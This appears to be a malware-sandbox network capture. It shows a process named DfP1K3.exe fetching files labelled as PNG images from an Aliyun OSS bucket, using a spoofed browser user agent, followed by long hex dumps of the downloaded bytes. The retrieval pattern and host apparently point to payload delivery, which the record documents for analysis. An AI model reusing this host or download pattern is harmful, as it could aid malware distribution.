                                                                                                              2025-01-11 03:43:22 UTC4096INData Raw: 25 d0 30 9f 75 4c 10 62 70 eb 2d f8 e9 2d e4 eb 35 d0 32 9f 75 84 12 62 70 eb 25 cc 30 5f b5 44 d2 a2 b0 2b ed 24 29 ed 18 4b a7 67 e5 18 a0 a0 a0 a0 23 dd 14 a0 d4 aa 2b f5 14 f2 5f f5 ec 92 e2 f0 6b a5 58 6b 05 bd 23 b5 6b 0c 61 0c 7c e5 e0 e0 88 df 68 e0 f0 88 50 3d e4 f0 1f b5 80 d0 a2 b0 03 54 ed a5 b0 67 a5 58 ed a5 b0 80 a0 a0 a0 67 a5 a0 ee a5 b0 a7 a0 a0 a0 67 a5 64 2e 65 70 60 60 60 60 a7 65 70 2e 65 70 b0 67 60 60 a7 65 6c 2e 65 70 61 60 60 60 a7 65 9c 2d a5 b0 a2 a0 a0 a0 c8 58 ed a5 b0 01 54 ed a5 b0 f0 5f b5 c4 d0 a2 b0 67 a5 ac ee a5 b0 a0 a0 a0 e0 88 14 e1 e0 e0 1f f5 2c 92 e2 f0 27 65 8c 1f 1f 1f 74 e0 e0 e0 6d 6d 8c 1f 1f 1f b1 1f f5 f8 d2 a2 b0 23 1d d0 5f 5f 5f a6 d3 96 67 a5 5c ed a5 b0 a4 a0 a0 a0 c8 58 ed a5 b0 2b b5 54 ed a5 70 32
                                                                                                              Data Ascii: %0uLbp--52ubp%0_D+$)Kg#+_kXk#ka|hP=TgXggd.ep````ep.epg``el.epa```e-XT_g,'etmm#___g\X+Tp2


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              13192.168.2.849990118.178.60.1034437124C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:43:50 UTC131OUTGET /extra-task2.png HTTP/1.1
                                                                                                              User-Agent: Chrome/114.0.0.0
                                                                                                              Host: upitem.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:43:50 UTC548INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:43:50 GMT
                                                                                                              Content-Type: image/png
                                                                                                              Content-Length: 1589824
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8F62E5F22343071B976
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "BA024D16008C2932005DB859C94476A8"
                                                                                                              Last-Modified: Tue, 07 May 2024 13:52:08 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 16714771568971376594
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000105
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: ugJNFgCMKTIAXbhZyUR2qA==
                                                                                                              x-oss-server-time: 13
                                                                                                              2025-01-11 03:43:50 UTC3548INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 54 00 00 02 c0 08 06 00 00 00 76 4e 6b 38 00 00 20 00 49 44 41 54 78 9c 9c fd 0b 96 ec ba 0a 2d 0a 8a bc bd a8 46 57 7b aa 2d af 2f 37 e5 a2 42 4a a8 8d 40 ac 73 c6 f9 29 ae 1a 96 f0 c7 c3 4b 00 ce 4e 63 cc f6 6a d8 91 e4 21 90 5c d8 a0 3a 98 21 dc 45 1c 05 ce 4e 7f 01 81 b6 26 e5 3e 00 b5 4d 6e 2a 70 93 f3 af ee b8 74 a1 c9 a0 9e 58 52 06 4c 39 83 94 75 65 f9 b9 74 78 66 41 24 b6 8c fe 7b 34 ca d8 46 76 c3 6a 19 be ba ba d0 ab a1 02 9c 6e cb 3b a5 1f 22 5f be 2c 1f 46 79 be 1d 31 c0 b4 f9 aa b2 c6 86 a2 a8 cf cb f6 4a 6a a2 97 e3 87 21 7c e8 ab cb 4a d3 46 e5 e3 52 39 b5 4c e4 51 79 d8 cc 4b 4b 02 5a dc e8 97 e6 78 79 1b b1 6d 06 2a 64 0e 29 26 25 07 aa c2 19 71 e2 ce 9a 2e 47 cf f2 59 52 8d 23 67
                                                                                                              Data Ascii: PNGIHDRTvNk8 IDATx-FW{-/7BJ@s)KNcj!\:!EN&>Mn*ptXRL9uetxfA${4Fvjn;"_,Fy1Jj!|JFR9LQyKKZxym*d)&%q.GYR#g
                                                                                                              2025-01-11 03:43:50 UTC4096INData Raw: 1e db cb 1c cf 5e bb 1e 7a 6e 22 89 71 ae 06 d9 4d 98 64 43 b4 85 be 17 a6 bc 9c cc e2 c7 15 d9 c9 ee c3 3e 92 54 95 eb 78 72 d3 48 71 37 52 e1 74 5b d9 1c 09 12 10 7a 36 c8 48 14 83 a8 51 f3 1f 87 cb 7d 6b 88 74 27 21 cc 63 79 dd 74 4d 73 81 c6 ab 0b 93 8c 52 4a 2b 59 76 53 5a 1f 17 f1 df 6c 72 29 e7 a8 0c e6 fa e3 28 60 31 35 ca 87 d8 92 38 2c 53 03 89 02 a8 e4 83 e0 db de 6d 22 a1 f7 c7 25 45 f0 37 b9 83 60 45 e5 2e 22 f1 c9 c2 06 a4 e0 18 3d ab 53 3e 08 a8 24 fd e5 64 0e ae 92 cb a3 ff c0 d4 09 ab 33 3a 61 f9 61 47 a9 c7 61 5c cd a1 44 c7 62 b0 70 ce 08 65 85 05 4d 9b 21 00 80 27 66 49 40 82 be 7a 3d b7 b6 41 b1 b5 ad bf e7 55 17 b3 75 5f e0 d3 c0 33 1d cb da 42 8d 79 b4 e2 74 2e f2 91 17 b4 26 a2 b7 fc 5c 6d fb d4 a3 b6 5a de 79 b3 79 e8 8a 84 ec 17
                                                                                                              Data Ascii: ^zn"qMdC>TxrHq7Rt[z6HQ}kt'!cytMsRJ+YvSZlr)(`158,Sm"%E7`E."=S>$d3:aaGa\DbpeM!'fI@z=AUu_3Byt.&\mZyy
                                                                                                              2025-01-11 03:43:50 UTC4096INData Raw: 02 b9 e7 8d 6e cf 34 1c e8 dd 41 b7 99 31 f3 e0 f1 96 4a 47 d5 1d 35 8b 12 f1 29 84 f0 0e 35 0a 68 f7 c3 b3 10 67 6d 69 06 a5 cd 0d 90 ae 9b 07 3d 99 f6 9a cf 91 1e f4 22 0e 9d 7f f4 21 37 ca c6 41 a0 4d 9c d1 f3 6b 5b e9 32 43 f4 19 4c 6d d5 2a e8 26 20 63 b1 e4 fb 03 bb 6f 48 a1 ba 9f c3 72 b3 69 38 ca 42 cb c4 6b 25 5f 9c 84 63 6c ba a4 2c ff 7b 05 43 93 83 cd a7 c0 ce db 24 1d c7 60 f4 b0 9c e4 eb 02 17 ed 4c e6 97 7c 5b 4a 2c 2e 2b 5c 23 5a 4f 25 23 fc 75 ad e5 a6 b8 f8 ba 4b f8 37 bf dd 2a 18 77 04 fb bf 41 39 82 fb 51 ff 5a e8 17 85 1c 10 1b d2 0e ef 3a a5 82 04 3a 18 96 a3 7a 7c 1e ad 77 13 f1 74 29 77 74 3e 15 80 6a ed 87 d8 ef 8f b7 55 8d c6 82 26 de 80 85 02 c7 9f 11 b5 46 79 00 2b 91 5d c4 d4 07 d0 d7 95 15 2a 80 56 03 06 33 10 78 f0 ac 20 96
                                                                                                              Data Ascii: n4A1JG5)5hgmi="!7AMk[2CLm*& coHri8Bk%_cl,{C$`L|[J,.+\#ZO%#uK7*wA9QZ::z|wt)wt>jU&Fy+]*V3x
                                                                                                              2025-01-11 03:43:50 UTC4096INData Raw: 4f a3 03 28 bf 93 69 73 76 0c 11 92 ce b8 6d 44 06 8d aa 02 96 a4 d9 cf 49 89 07 91 81 61 1b 57 f3 14 8c 77 16 74 d1 ac d2 e9 d7 d5 e7 d6 45 79 ed 19 e3 10 ea 58 ac 7d fc 00 03 85 f8 b5 1e 73 26 3f ab 95 6d 6f b0 e1 ba 7a 1c 76 6e 12 90 00 12 e2 3a 2c 6a c3 1c 08 b4 f9 09 8c e0 8f 1e 3a 64 f1 b3 82 2f d4 fa 2f 84 99 fb 4d 72 94 d4 5c 6f b1 66 bc c6 bd 15 39 6f a9 7d 49 d3 ad 25 e1 e7 86 03 e5 e6 12 3c 06 28 22 49 3a 5f a4 f4 c8 bd ac df fb 52 8b 69 cd 8a 89 8e 0f 9f ec 57 c7 55 a6 64 fd be ea 3c b4 cd 56 1e be 3d 5d ef b2 09 95 68 c2 84 cf 5f 2f cd 4d 44 01 c7 dc 9d e7 6c c1 f5 53 6a d4 71 0f 55 39 46 a4 4e 72 61 a2 31 65 a7 6e e6 28 71 aa 55 b4 93 bc fb 9f c5 61 7f e9 36 5f df c2 38 8f 73 4f bf 90 06 ca 80 9e 5d 54 21 7e 3f b9 8d e0 ff ad c9 94 ae a8 3d
                                                                                                              Data Ascii: O(isvmDIaWwtEyX}s&?mozvn:,j:d//Mr\of9o}I%<("I:_RiWUd<V=]h_/MDlSjqU9FNra1en(qUa6_8sO]T!~?=
                                                                                                              2025-01-11 03:43:50 UTC4096INData Raw: 83 9f 3b 09 c9 99 25 77 03 b7 f1 0b 1b b0 99 e1 da 02 7d 96 0d c8 ca a5 50 91 51 78 76 c4 ed 7a fc d5 1a 2a 9f 59 8e 63 49 f7 4d 9c e5 1b d8 b9 a7 d0 5f 55 f5 77 4d da f1 d8 79 fd 0a 3d 15 ca 49 04 07 d7 14 cc 91 b1 e7 67 e2 58 8e 2e c8 ff 7d 12 12 ad 25 9d cc e3 18 1c 13 c9 bc 9d 7b 04 4d b9 66 46 04 74 87 95 3d 95 5c e2 3f e9 92 6d cb 93 c0 cf e6 c0 ec 10 9a 35 70 4f f8 55 c8 14 77 7b d8 50 6d fc 41 21 13 f8 a6 56 ac 55 0b 5b 53 c7 61 ec d9 e2 31 c5 cd ae a2 4d d4 b1 ec 6b 30 e2 80 45 a5 5b 76 92 df e5 ed 30 15 0f ea c9 d1 a2 d4 fc 6f a5 bd 66 54 1f a9 f5 74 a0 72 37 19 9e b9 c8 10 de e0 27 e0 d6 1b 6f 3b ab 9f 56 36 44 4d ee e6 2b 52 19 b6 1b 82 60 06 6a 47 eb 43 be c3 0a b7 1f 11 79 2e 15 79 1f 21 9f 07 c0 09 6f d6 d9 e2 87 e0 ce 62 c9 bf bb 6f b6 25
                                                                                                              Data Ascii: ;%w}PQxvz*YcIM_UwMy=IgX.}%{MfFt=\?m5pOUw{PmA!VU[Sa1Mk0E[v0ofTtr7'o;V6DM+R`jGCy.y!obo%
                                                                                                              2025-01-11 03:43:50 UTC4096INData Raw: 57 e8 93 95 cc 20 d7 78 af 8b bc 5f b3 cc 64 3b c5 ed 5a 1a 0d 8f 8a 47 1f 95 13 65 37 0f 7a d2 3d b0 1c 85 4f 13 ae 58 28 87 83 d1 27 b3 60 c8 1c 94 4d 05 00 f4 b0 91 55 7a 6a 77 5a 98 ea de 70 ce 7a f4 e7 58 36 5a 0c 4b 85 a6 65 a4 e5 02 81 18 76 b7 44 4e 2d cb 7f 1a 39 42 57 db 60 50 8d 3d 06 d3 70 ea 1f 81 06 a3 49 c2 81 d7 f6 da 59 df ad 3a b8 c0 ae 36 fb 2b a7 65 7b df fa 4f eb 13 37 72 09 de 5e 48 d3 aa d4 21 a5 aa 49 09 90 0f c5 a4 4a ae 32 38 4f 8d 9f 08 0e a0 a3 45 c3 33 9f b9 15 38 2f fc 91 b9 90 fb ac d1 2d 4c e0 1e be d3 b1 54 27 2c 4f 1d 81 df 6d 8b 7b ab 47 3e 42 be 29 ef b4 72 85 5d 78 d0 2f 08 9a d0 07 b7 92 bf f7 db 5b 49 5d fc 9d 76 38 6f 4f dd 7d 0f 2e 05 f5 de 2d da c9 5d 03 aa d2 ed 13 64 68 87 78 4b 33 c9 4e 13 27 d9 26 15 ca f8 29
                                                                                                              Data Ascii: W x_d;ZGe7z=OX('`MUzjwZpzX6ZKevDN-9BW`P=pIY:6+e{O7r^H!IJ28OE38/-LT',Om{G>B)r]x/[I]v8oO}.-]dhxK3N'&)
                                                                                                              2025-01-11 03:43:50 UTC4096INData Raw: c9 9c 50 a9 06 eb d5 7e 85 ac 29 f4 fc 25 bb b2 0f 71 e5 bc cd af 05 b5 07 27 1e 5d 28 3d 11 df e5 93 3b 0b 2a 57 45 7f 4a 5f 12 7f bd 32 0c 19 94 66 40 26 fe ec f4 06 a0 a0 42 1e d3 09 f2 c5 d0 b5 b7 f6 7e 4e fb 34 01 81 79 e7 63 89 5b 3b 98 d3 4c a6 4f 28 11 7a a8 5e 34 e4 59 b7 2e e6 86 4a 3a 8c d4 b0 a8 f8 cd 91 b6 3e a3 30 b4 e2 16 26 e3 11 05 42 0c cf 1a a8 12 de 88 6f 67 1c 28 07 c3 03 bf 1d 53 51 70 12 a7 e9 c0 ab d5 e6 72 6c 27 4c 8a e6 b5 13 74 3d 14 21 1d b3 43 6a fe d1 bd 23 2d dc 77 33 80 53 c6 09 d3 7a 89 ca d2 e1 41 d6 0b c9 ec d4 c9 1d b9 a3 ff 38 5c 2d 21 1c 2e 48 bd ed f9 ae 7e a7 b2 6d e9 bd 11 d1 59 b5 a3 f0 6e 18 95 b4 60 16 75 88 0d c0 7f 54 38 fa 2e 78 58 40 37 81 7c 7a f5 c9 23 60 6a 57 48 22 06 91 63 64 53 e8 8c 45 02 7d c7 bd 16
                                                                                                              Data Ascii: P~)%q'](=;*WEJ_2f@&B~N4yc[;LO(z^4Y.J:>0&Bog(SQprl'Lt=!Cj#-w3SzA8\-!.H~mYn`uT8.xX@7|z#`jWH"cdSE}
                                                                                                              2025-01-11 03:43:50 UTC4096INData Raw: a4 ce 1b 3f b1 95 f5 e2 f7 1d ca 9b a6 e3 de 50 05 be 4b 09 79 80 9f bf 28 8b a3 2d cb 60 1a cb 5a 62 c5 a8 6f 61 23 c0 ba 5a b4 ce 73 ac c3 10 36 06 7e cf 55 91 84 23 ca a4 7f 64 ad eb f9 42 d4 65 45 38 1d ea 85 58 ee 90 f7 c5 ad 82 1e aa ab ec 28 11 9d 08 75 8e 99 23 51 56 12 bb f2 ec a5 8c 71 52 30 12 8f b2 22 03 54 49 17 2d a9 e2 9b c9 d8 91 3d e6 4b e2 54 8d 20 7a 98 65 6a a6 80 f3 2a 47 63 e8 9e d3 10 a3 c1 d5 de 99 04 32 c0 6c 88 f1 2b 35 a2 46 f4 ea 5b 0c 34 6e c2 95 e5 52 f6 ef bc 63 f5 ff c0 ba b5 a1 61 b0 37 98 b5 8b 50 f2 b3 ff 86 a3 86 34 9d e1 d7 31 2c 2e d4 ae ca 03 9b 17 e1 5b 38 fa 2b a7 ee 18 ec bc f2 fd 26 d2 71 4e fc 6c a2 3d 51 f7 42 b0 e6 5d a8 9f 6b 56 d0 45 02 38 11 fc 1e e1 87 50 68 ee 1f 1e 4d f4 4c 09 27 ce 66 df b2 36 7a 52 e3
                                                                                                              Data Ascii: ?PKy(-`Zboa#Zs6~U#dBeE8X(u#QVqR0"TI-=KT zej*Gc2l+5F[4nRca7P41,.[8+&qNl=QB]kVE8PhML'f6zR
                                                                                                              2025-01-11 03:43:50 UTC4096INData Raw: 32 53 be f8 e1 2c e4 5a 11 81 f9 a6 d2 6c 61 df 95 a9 4b d9 2a 41 e6 db af 73 74 3b 57 6e 91 aa 58 48 2a 5b a7 c8 63 b7 00 5e a2 91 55 1a 3a 46 37 72 6b d2 88 c6 37 94 fe 9b 5e 56 8d f8 1e f8 77 1d b7 40 c1 be 7d 16 90 29 04 a9 bf ac 47 7f 75 1a 2a eb 90 a6 76 52 c9 79 a2 0c 24 a4 27 c4 8c a5 92 9d e1 b0 8d e9 4d 28 fe ef 9c 9a ae dc 09 4b 88 04 d5 64 46 5b 35 70 76 67 fa 4f b6 77 10 3e 6d 5c 26 99 f0 5e 70 41 47 4f 86 43 3c c2 e1 ff 6c 88 c0 0b c6 69 df 26 48 b4 ee 01 20 17 95 2d 58 53 25 ed 89 0f 86 5d c0 bd 8c b2 ea 67 ff 6e 0d 46 21 65 29 7c cc 51 2c f1 fc c6 5f 33 e1 c3 4c c3 56 b3 e0 db a9 96 fc aa b5 79 04 4b 76 8b 58 b6 c5 2d 21 24 53 ab b4 57 82 d7 1f 5b 9c 5e f4 72 cc 55 3a 7d b4 71 25 8d 23 80 46 c0 98 25 44 d1 1d df bc 03 70 90 76 34 3f fe c6
                                                                                                              Data Ascii: 2S,ZlaK*Ast;WnXH*[c^U:F7rk7^Vw@})Gu*vRy$'M(KdF[5pvgOw>m\&^pAGOC<li&H -XS%]gnF!e)|Q,_3LVyKvX-!$SW[^rU:}q%#F%Dpv4?
                                                                                                              2025-01-11 03:43:50 UTC4096INData Raw: b0 46 4a 18 a4 5b df a0 4c 0b a6 0f 91 d2 5e 2a 3f 0e 08 a1 76 13 8d bc eb 81 1b 98 ac 98 fd a6 92 2d 18 63 44 41 2b 6f 93 4a 90 b5 bd 55 f9 9e c0 fd 0b 40 c4 20 4e c8 a3 7d 18 f8 03 b9 16 a2 7d f0 5b dc 69 1f 83 bd a0 a8 db c6 6b ad 9f fe 4b 55 02 16 dc 81 1b 3a 30 2d 16 27 93 38 3a 3f ca 2d 56 13 69 ff 3e 2c 74 e7 e2 e7 b9 9a 3c 24 2c f7 68 99 b1 ff 55 a4 31 a9 92 b9 7b ff 07 73 b6 80 63 50 79 5d a3 82 b8 d9 83 b7 bb 5f 8f 88 0b 5f 11 61 a7 45 20 e5 f8 37 ed c3 fd 2e 12 cb c5 f6 bb 01 a7 ce 60 88 e4 54 b4 14 eb dd f0 5e 0e 71 96 29 ce 6e cf fb 11 49 0d 5f 56 be a6 37 e1 4e b0 be 1c 3b ef 00 3b f5 fd 09 69 ce 43 dc 42 84 d7 a6 5d 9a cb 0a 96 74 e4 b2 10 81 67 b8 03 84 89 ff 87 ea 89 5c b6 37 b6 f9 3d 49 d1 e0 12 59 10 77 ca 12 73 9f c0 20 54 3d 92 47 b3
                                                                                                              Data Ascii: FJ[L^*?v-cDA+oJU@ N}}[ikKU:0-'8:?-Vi>,t<$,hU1{scPy]__aE 7.`T^q)nI_V7N;;iCB]tg\7=IYws T=G


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              14192.168.2.849991118.178.60.1034437124C:\Program Files (x86)\DfP1K3\DfP1K3.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2025-01-11 03:43:54 UTC127OUTGET /dsb-hr2.png HTTP/1.1
                                                                                                              User-Agent: Chrome/114.0.0.0
                                                                                                              Host: upitem.oss-cn-hangzhou.aliyuncs.com
                                                                                                              Cache-Control: no-cache
                                                                                                              2025-01-11 03:43:54 UTC544INHTTP/1.1 200 OK
                                                                                                              Server: AliyunOSS
                                                                                                              Date: Sat, 11 Jan 2025 03:43:54 GMT
                                                                                                              Content-Type: image/png
                                                                                                              Content-Length: 57536
                                                                                                              Connection: close
                                                                                                              x-oss-request-id: 6781E8FA53726E363066B3D3
                                                                                                              Accept-Ranges: bytes
                                                                                                              ETag: "9E285C23C9DA187B313051DD6FEB4266"
                                                                                                              Last-Modified: Fri, 22 Mar 2024 09:16:17 GMT
                                                                                                              x-oss-object-type: Normal
                                                                                                              x-oss-hash-crc64ecma: 2580453812540855072
                                                                                                              x-oss-storage-class: Standard
                                                                                                              x-oss-ec: 0048-00000105
                                                                                                              Content-Disposition: attachment
                                                                                                              x-oss-force-download: true
                                                                                                              Content-MD5: nihcI8naGHsxMFHdb+tCZg==
                                                                                                              x-oss-server-time: 5
                                                                                                              2025-01-11 03:43:54 UTC3552INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 09 54 00 00 02 c0 08 06 00 00 00 76 4e 6b 38 00 00 20 00 49 44 41 54 78 9c 9c fd 0b 96 ec ba 0a 2d 0a 8a bc bd a8 46 57 7b aa 2d af 2f 37 f8 b3 d1 4e bf 8d 41 ac 7f c6 ab ba 6d bd da 8e f1 7d ef 1a ce 4e 84 d6 b6 6a dd 91 e4 21 da 72 92 f0 7d 6a 8f 11 5b e0 04 fa 4d d4 61 15 b7 2f ea 17 a3 dd 1b 32 8a 47 49 5c 28 3b 5b 4b 08 39 62 1a a3 27 c9 09 8d 31 ad 47 eb 82 90 50 c5 cf 98 f3 27 3d 64 f6 3b 33 dc 51 8b 51 78 38 38 70 7a b5 26 d2 3a 9b d7 ca 3b cb bc 44 c7 0b 0e 59 fd 4d 60 a7 98 14 ff 07 06 26 ba 2a b2 a1 11 e1 a2 9c d3 7a bb 02 b9 c8 59 52 03 8e 3c 34 cd 27 c0 32 4a d7 55 0c ac 7a a0 71 ee d8 ee b0 d3 b6 11 21 10 a8 fc a0 a8 32 82 6a e9 da 11 a2 11 e6 ae dd 3b 0e 09 4d 30 13 c2 38 64 d8 39 69 de
                                                                                                              Data Ascii: PNGIHDRTvNk8 IDATx-FW{-/7NAm}Nj!r}j[Ma/2GI\(;[K9b'1GP'=d;3QQx88pz&:;DYM`&*zYR<4'2JUzq!2j;M08d9i
                                                                                                              2025-01-11 03:43:54 UTC4096INData Raw: 0a d7 92 25 eb f9 09 1a e6 06 e2 9d 48 ac 4a c2 fa 01 eb 5e 5e a4 6b a9 d7 b6 e4 c4 87 c9 a2 a1 1a a8 27 67 36 a6 e1 29 a9 30 2a 4d 98 5d 7e d7 8d 82 01 77 55 e0 15 6b e6 89 43 42 f6 1e 35 e1 22 ad 9e 81 39 14 ec 9c 69 10 31 16 ae d2 7e 19 03 13 b4 89 67 8a 65 0e e4 3b c5 b0 b9 3e 67 26 30 aa 16 2b 6e 02 c4 a8 82 61 18 b7 6f 1e ef f1 23 b8 3e 98 a9 1f e8 b6 9a 83 04 e2 8a b6 ae 85 3b c3 83 8e 0d e4 3e 01 bd 0c 8f b1 3f d4 99 3e 3d e6 fa f7 cc 9b d0 d5 6d 24 67 f1 aa 30 4e e8 32 54 84 f7 0c 89 48 37 e2 5b f4 f8 d4 82 d7 3a 07 c5 1a b2 15 cf d0 dc 23 73 39 1e 63 9e ea 64 37 b0 e5 d5 58 7c c7 3b 45 49 46 63 44 6c 3e 40 6d 3a 64 17 ea 4c 04 19 b6 49 d6 5a 49 95 a8 74 9c 35 a3 77 4e b0 d3 ea 28 8e 9a 2f dc e2 28 e5 6d e7 05 06 3d 82 7e 6f 1f df 64 22 c2 99 61
                                                                                                              Data Ascii: %HJ^^k'g6)0*M]~wUkCB5"9i1~ge;>g&0+nao#>;>?>=m$g0N2TH7[:#s9cd7X|;EIFcDl>@m:dLIZIt5wN(/(m=~od"a
                                                                                                              2025-01-11 03:43:54 UTC4096INData Raw: 26 a6 8e 04 d0 06 2c c8 a5 50 da f8 ab 10 86 d2 79 17 49 c6 1c ae fb 87 17 a8 2b 09 77 77 a4 7c b3 b8 24 b1 d2 67 15 00 57 0c 66 9d 13 cc 50 30 82 54 4a 87 18 13 5a 6d 9d ab 52 d4 a7 ae f9 8c 19 47 58 51 d3 b3 b2 32 3e c4 6a c5 85 bd f7 41 ef e1 1b f9 e7 3c 28 66 30 aa a0 45 0e 98 7e 4b 9c ec f1 8f 5b c9 8d 91 9f f6 14 6c 97 f3 87 18 74 46 86 9a 01 a8 a1 b2 ee 20 32 39 a6 cd d1 be 2f ee ae f8 e3 a6 f9 eb 3e 5e 8c 1b cc 3c 51 e0 ee 67 4b 74 d1 67 fe 93 dd 51 99 9d 36 b7 3f 56 db 72 22 20 30 5f 85 bb 6b a8 ad 43 39 c1 53 72 ac e2 fe bc ab 48 33 af c8 d4 73 29 a7 66 52 d0 d8 f9 ea 6b 99 62 73 74 81 42 de 38 e5 fa 79 88 b6 cb ca 9c 56 cc 19 95 95 ac 62 77 7f 60 92 12 d7 be 73 aa e1 f0 df 96 e2 05 63 6d da cb 44 47 72 47 53 5a f3 0e 97 45 27 48 70 a1 ed 31 17
                                                                                                              Data Ascii: &,PyI+ww|$gWfP0TJZmRGXQ2>jA<(f0E~K[ltF 29/>^<QgKtgQ6?Vr" 0_kC9SrH3s)fRkbstB8yVbw`scmDGrGSZE'Hp1
                                                                                                              2025-01-11 03:43:54 UTC4096INData Raw: 17 e8 c1 cb 76 16 dc 71 70 3c c4 26 0f d2 f8 c5 94 b7 99 09 9e 5f 35 2e 94 4e d6 6b 76 b6 f8 a8 fc b3 99 df 1c 31 c0 ab 2c 14 e6 a1 61 99 3d 37 06 ba 84 33 13 7d 2f 30 ec 72 08 35 3e 54 27 79 13 d2 c4 f7 78 d9 d0 f1 80 d6 ee 5d 4b fd 3f 0c 3f e3 d1 d5 f7 68 d8 10 d0 c2 29 cd 8b 22 34 1e 83 d1 a1 e4 61 ed 10 6e 44 db 31 a4 9e 14 31 b4 c5 8a 48 b2 09 5a 4d d0 8f 69 bf b4 00 76 73 f4 e4 0b 20 d8 72 b8 38 8b c6 bd dc aa b0 21 5a bf 9b b6 5e 50 39 92 04 35 27 4b e8 9e 7c a9 90 51 40 41 52 5d 2e 14 50 5c 84 8c 5f f0 29 79 c1 24 54 d3 25 e3 a9 c2 65 3c 84 2c 1b 90 e5 5c 34 d0 4d 1f 59 f7 f8 ab 25 da a8 33 39 6a ea 78 87 82 71 55 91 65 42 99 19 65 db 99 70 58 5f 6a d5 6b c3 26 70 df cd 87 dd 2b 2f 73 e7 94 93 a1 22 41 cd 62 1f 4b 74 ca 3a 2b d5 cb cb 49 e6 20 f9
                                                                                                              Data Ascii: vqp<&_5.Nkv1,a=73}/0r5>T'yx]K??h)"4anD11HZMivs r8!Z^P95'K|Q@AR].P\_)y$T%e<,\4MY%39jxqUeBepX_jk&p+/s"AbKt:+I
                                                                                                              2025-01-11 03:43:54 UTC4096INData Raw: 52 fb c1 10 6c a6 dd 2d 6d bb 5a 8c 69 09 52 d4 3d 29 a0 af e0 8b fa 3e 0f 57 40 7a 42 21 7e 74 e2 46 c4 c1 93 69 e4 85 56 ca 8c dc a2 76 17 25 39 4f a3 b0 d6 bf 88 6c ad 3b 6a d2 43 1c db 98 7c 85 b3 f7 d2 b6 87 3d f2 27 ad c3 6c cf bf a9 52 71 4a e9 19 d4 68 00 44 4d 63 87 a9 a2 0c f4 37 bc a5 e4 9c c0 f5 59 eb 23 ec 54 80 e7 cd c4 11 c3 a1 19 70 53 05 89 50 d7 b3 75 19 3b f1 ec 7c f7 97 aa 02 7c 73 74 3f 2a c9 16 27 83 11 37 b9 3b a6 95 8b 0b 21 9d b4 ad c6 2a 56 32 46 2c a2 f6 df b1 cd 28 a0 bb 18 56 1b c5 69 85 5c e3 dc 57 ba 61 87 3c c8 c2 f4 76 12 64 84 c0 73 97 56 8c 48 f8 64 aa 26 2a 0c 54 12 80 50 67 3e f7 be ed ed d3 70 bd bc 9a 4e 65 1a c6 23 7c 7e 7e 42 91 53 57 7a ec 7c ea 1e e6 2a df e4 4e 85 68 86 f7 f1 22 61 52 e7 89 6d c9 76 e8 fe 45 c3
                                                                                                              Data Ascii: Rl-mZiR=)>W@zB!~tFiVv%9Ol;jC|='lRqJhDMc7Y#TpSPu;||st?*'7;!*V2F,(Vi\Wa<vdsVHd&*TPg>pNe#|~~BSWz|*Nh"aRmvE
                                                                                                              2025-01-11 03:43:54 UTC4096INData Raw: f5 31 70 b2 09 80 f5 03 e5 56 7d fb e1 36 f4 41 34 c3 66 51 03 9c 32 dd a5 4c 32 8e f5 99 cc bf 81 ba c1 78 fb 95 a7 cd 47 a6 12 b2 91 2f 81 53 56 38 8e 30 86 89 ed 0d d3 1e d1 11 73 1b e9 7e 28 61 76 3e 44 e0 2c ca 42 54 38 fa a4 69 53 dc b2 00 9c f3 e8 1d e0 e2 bc ac 3a db cd 35 d6 da 63 1e 96 63 9e a0 b2 1f 26 43 c6 e4 1f 21 3d a0 83 7b 6e 88 72 36 4c b3 32 66 f1 0c a4 b6 64 4b 88 99 2e 11 fa 6c e5 da d3 5a 78 c9 83 08 2f 40 73 a7 a4 d4 5e 26 5e 11 60 94 40 93 83 6e de ff 5d d9 cd e7 15 cf 5d 84 7e 21 de 29 60 51 e8 b6 c7 0a 75 db b3 73 e9 24 2a a3 d1 53 5f 7e ce 3c b3 9e 62 ab 5e 7b 10 ee c6 de 59 2c 61 4e 44 0e b7 04 f7 24 0a 62 09 68 ba f8 e7 28 ae 77 3c 96 da 38 22 54 76 f9 8f ef 0b ac a3 08 c7 1c 6f ca 34 c0 c2 55 5c 44 c7 43 01 20 03 c4 3b 77 06
                                                                                                              Data Ascii: 1pV}6A4fQ2L2xG/SV80s~(av>D,BT8iS:5cc&C!={nr6L2fdK.lZx/@s^&^`@n]]~!)`Qus$*S_~<b^{Y,aND$bh(w<8"Tvo4U\DC ;w
